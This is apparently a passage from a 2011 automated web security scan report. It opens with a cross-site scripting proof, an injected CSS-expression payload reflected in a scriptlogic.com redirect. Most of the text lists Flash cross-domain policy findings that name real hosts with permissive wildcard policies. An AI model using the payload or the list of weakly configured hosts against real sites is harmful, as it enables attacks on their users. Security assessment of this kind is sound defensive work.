User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scriptlogic.com/
Cookie: ASP.NET_SessionId=xb0qfr4504ypwiftm1n1r545; Referrer=http://www.sedoparking.com/search/registrar.php?registrar=sedonewreg&domain=formlessnetworking.com; EntryPoint=/int/am/prodsel/050709; __utma=197983533.2053962264.1304447516.1304447516.1304447516.1; __utmb=197983533.3.10.1304447516; __utmc=197983533; __utmz=197983533.1304447516.1.1.utmcsr=sedoparking.com|utmccn=(referral)|utmcmd=referral|utmcct=/search/registrar.php; _jsuid=2631301918575094172; s_cc=true; gpv_p11=Default; s_nr=1304447642079-New; s_vnum=1307039515685%26vn%3D1; s_invisit=true; s_sq=slcproduction%3D%2526pid%253DDefault%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.scriptlogic.com%25252F%252523%2526ot%253DA; EntryPointCheck=5/3/2011 9:32:06 AM

Response

HTTP/1.1 302 Found
Date: Tue, 03 May 2011 13:45:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: http://dl.scriptlogic.com/download/default.aspx?pid=1087aecf'style='x:expr/**/ession(alert(1))'12ed669cb32&r=http%3a%2f%2fwww.sedoparking.com%2fsearch%2fregistrar.php%3fregistrar%3dsedonewreg%26domain%3dformlessnetworking.com
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 346

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='http://dl.scriptlogic.com/download/default.aspx?pid=1087aecf'style='x:expr/**/ession(alert(1))'12ed669cb32&amp;r=http%3a%2f%2fwww.sedoparking.com%2fsearch%2fregistrar.php%3fregistrar%3dsedonewreg%26domain%3dformlessnetworking.com'>
...[SNIP]...

6. Flash cross-domain policy  previous  next
There are 50 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


6.1. http://18.xg4ken.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://18.xg4ken.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 18.xg4ken.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:15:03 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Mon, 21 Dec 2009 22:59:19 GMT
ETag: "35800d-c6-47b450a15bfc0"
Accept-Ranges: bytes
Content-Length: 198
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.2. http://a.unanimis.co.uk/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.unanimis.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.unanimis.co.uk

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:24:25 GMT
Server: Apache
Last-Modified: Tue, 21 Dec 2010 00:56:43 GMT
ETag: "df384-c7-497e11c2d28c0"
Accept-Ranges: bytes
Content-Length: 199
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

6.3. http://ad.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 21:42:14 GMT
Date: Tue, 03 May 2011 13:33:16 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

6.4. http://ad.uk.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.uk.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.uk.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 393
Last-Modified: Wed, 22 Oct 2008 18:22:35 GMT
Date: Tue, 03 May 2011 10:22:05 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.5. http://adfarm.mediaplex.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adfarm.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: adfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"204-1289502469000"
Last-Modified: Thu, 11 Nov 2010 19:07:49 GMT
Content-Type: text/xml
Content-Length: 204
Date: Tue, 03 May 2011 10:22:45 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

6.6. http://aperture.displaymarketplace.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://aperture.displaymarketplace.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: aperture.displaymarketplace.com

Response

HTTP/1.0 200 OK
Content-Length: 268
Content-Type: text/xml
Content-Location: http://aperture.displaymarketplace.com/crossdomain.xml
Last-Modified: Wed, 06 Jan 2010 19:44:14 GMT
Accept-Ranges: bytes
ETag: "88db83a088fca1:6d5c"
Server: Microsoft-IIS/6.0
X-Server: D1A
P3P: CP="NON DEVo PSAo PSDo CONo OUR BUS UNI"
X-Powered-By: ASP.NET
Expires: Tue, 03 May 2011 13:33:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 13:33:17 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
   <site-control perm
...[SNIP]...

6.7. http://b.scorecardresearch.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Wed, 04 May 2011 10:21:49 GMT
Date: Tue, 03 May 2011 10:21:49 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

6.8. http://cspix.media6degrees.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cspix.media6degrees.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cspix.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"288-1225232951000"
Last-Modified: Tue, 28 Oct 2008 22:29:11 GMT
Content-Type: application/xml
Content-Length: 288
Date: Tue, 03 May 2011 13:58:24 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="*" headers="*"
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.9. http://dis.us.criteo.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dis.us.criteo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: dis.us.criteo.com

Response

HTTP/1.1 200 OK
Server: nginx
Cache-Control: max-age=31104000
Cache-Control: public
Content-Type: text/xml
Date: Tue, 03 May 2011 13:30:00 GMT
Expires: Fri, 27 Apr 2012 13:30:00 GMT
Accept-Ranges: bytes
Connection: close
Last-Modified: Wed, 19 Sep 2007 08:50:25 GMT
Content-Length: 360

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all" />

...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

6.10. http://edge.aperture.displaymarketplace.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://edge.aperture.displaymarketplace.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: edge.aperture.displaymarketplace.com

Response

HTTP/1.0 200 OK
Content-Length: 268
Content-Type: text/xml
Content-Location: http://edge.aperture.displaymarketplace.com/crossdomain.xml
Last-Modified: Wed, 06 Jan 2010 19:44:14 GMT
Accept-Ranges: bytes
ETag: "88db83a088fca1:a52"
Server: Microsoft-IIS/6.0
X-Server: D2C.NJ-a.dm.com
P3P: CP="NON DEVo PSAo PSDo CONo OUR BUS UNI"
X-Powered-By: ASP.NET
Expires: Tue, 03 May 2011 13:32:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 13:32:56 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
   <site-control perm
...[SNIP]...

6.11. http://g.msn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://g.msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: g.msn.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 09 Oct 2008 18:52:49 GMT
Accept-Ranges: bytes
ETag: "fee1eb39402ac91:0"
Server: Microsoft-IIS/7.5
Date: Tue, 03 May 2011 13:22:31 GMT
Connection: keep-alive
Content-Length: 104

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.12. http://in.getclicky.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://in.getclicky.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: in.getclicky.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:42:37 GMT
Server: Apache
Last-Modified: Tue, 30 Nov 2010 03:42:11 GMT
ETag: "5d8140-c9-4963cf9438ac0"
Accept-Ranges: bytes
Content-Length: 201
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.13. http://metrics.seenon.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.seenon.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.seenon.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:33:23 GMT
Server: Omniture DC/2.0.0
xserver: www298
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.14. http://now.eloqua.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://now.eloqua.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: now.eloqua.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Content-Type: text/xml
Last-Modified: Tue, 26 May 2009 19:46:00 GMT
Accept-Ranges: bytes
ETag: "04c37983adec91:0"
Server: Microsoft-IIS/7.5
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 13:42:29 GMT
Connection: keep-alive
Content-Length: 206

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
   SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

6.15. http://pixel.33across.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.33across.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: W/"211-1298012421000"
Last-Modified: Fri, 18 Feb 2011 07:00:21 GMT
Content-Type: application/xml
Content-Length: 211
Date: Tue, 03 May 2011 13:58:21 GMT
Connection: close
Server: 33XG1

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-doma
...[SNIP]...

6.16. http://scriptlogiccorp.d2.sc.omtrdc.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://scriptlogiccorp.d2.sc.omtrdc.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: scriptlogiccorp.d2.sc.omtrdc.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:43:23 GMT
Server: Omniture DC/2.0.0
xserver: www308
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.17. http://statse.webtrendslive.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://statse.webtrendslive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: statse.webtrendslive.com

Response

HTTP/1.1 200 OK
Content-Length: 82
Content-Type: text/xml
Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT
Accept-Ranges: bytes
ETag: "ef9fe45d4643c81:85a"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:20:48 GMT
Connection: close

<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

6.18. http://tc.barclays.co.uk/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tc.barclays.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tc.barclays.co.uk

Response

HTTP/1.1 200 OK
Cache-control: no-cache, private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Date: Tue, 03 May 2011 10:22:51 GMT
Content-Type: application/xml; charset=ISO-8859-1
Content-Length: 79
Last-Modified: Tue, 03 May 2011 10:22:51 GMT
Connection: Keep-Alive
Set-Cookie: NSC_Cbsdmb`tGjstuQbsu`=4454b2367804;expires=Tue, 03-May-11 14:22:51 GMT;path=/

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

6.19. http://www.1day1year.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.1day1year.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.1day1year.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:27:13 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 05 Apr 2011 16:30:37 GMT
Accept-Ranges: bytes
Content-Length: 254
Cache-Control: public
Expires: Thu, 02 Jun 2011 13:27:13 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml; charset=utf-8

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*"/>
...[SNIP]...

6.20. http://www.bangkokpost.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bangkokpost.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:38:04 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Sun, 17 Oct 2010 17:54:45 GMT
ETag: "173825a-130-c1432340"
Accept-Ranges: bytes
Content-Length: 304
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6.21. http://www.newsroom.barclays.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsroom.barclays.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.newsroom.barclays.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
Content-Type: text/xml
Date: Tue, 03 May 2011 10:21:44 GMT
Accept-Ranges: bytes
ETag: "0efee354d4cb1:0"
Connection: close
Last-Modified: Thu, 24 Feb 2011 09:21:26 GMT
X-Powered-By: ASP.NET
Content-Length: 106

...<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.22. https://adwords.google.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://adwords.google.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: adwords.google.com

Response

HTTP/1.0 200 OK
P3P: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Tue, 03 May 2011 01:25:15 GMT
Expires: Wed, 04 May 2011 01:25:15 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 42551

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

6.23. http://answers.yahoo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://answers.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: answers.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:14:23 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Thu, 17 Jun 2010 15:57:01 GMT
Accept-Ranges: bytes
Content-Length: 228
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

6.24. http://api.bing.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://api.bing.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.bing.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Content-Length: 634
Content-Type: text/xml
Last-Modified: Fri, 01 Oct 2010 21:58:33 GMT
ETag: A06DD1053D1686DFCEF21D90E3BAD7190000027A
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Tue, 03 May 2011 13:14:22 GMT
Connection: close
Set-Cookie: _MD=alg=m2&C=2011-05-03T13%3a14%3a22; expires=Fri, 13-May-2011 13:14:22 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=C3C1517A18C04672849B462BAC004B13; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&DomainVertical=0&Cashback=0&MSCorp=kievfinal&GeoPerf=0&Release=or3; domain=.bing.com; path=/
Set-Cookie: SRCHD=D=1754714&MS=1754714; expires=Thu, 02-May-2013 13:14:22 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHUID=V=2&GUID=CCB8F84834AF459095A21C34AA9F833D; expires=Thu, 02-May-2013 13:14:22 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110503; expires=Thu, 02-May-2013 13:14:22 GMT; domain=.bing.com; path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-http-request-headers-from domain="*.bing.com" he
...[SNIP]...
<allow-access-from domain="*.bing.com"/>
...[SNIP]...
<allow-access-from domain="blstc.msn.com"/>
...[SNIP]...
<allow-access-from domain="stc.sandblu.msn-int.com"/>
...[SNIP]...

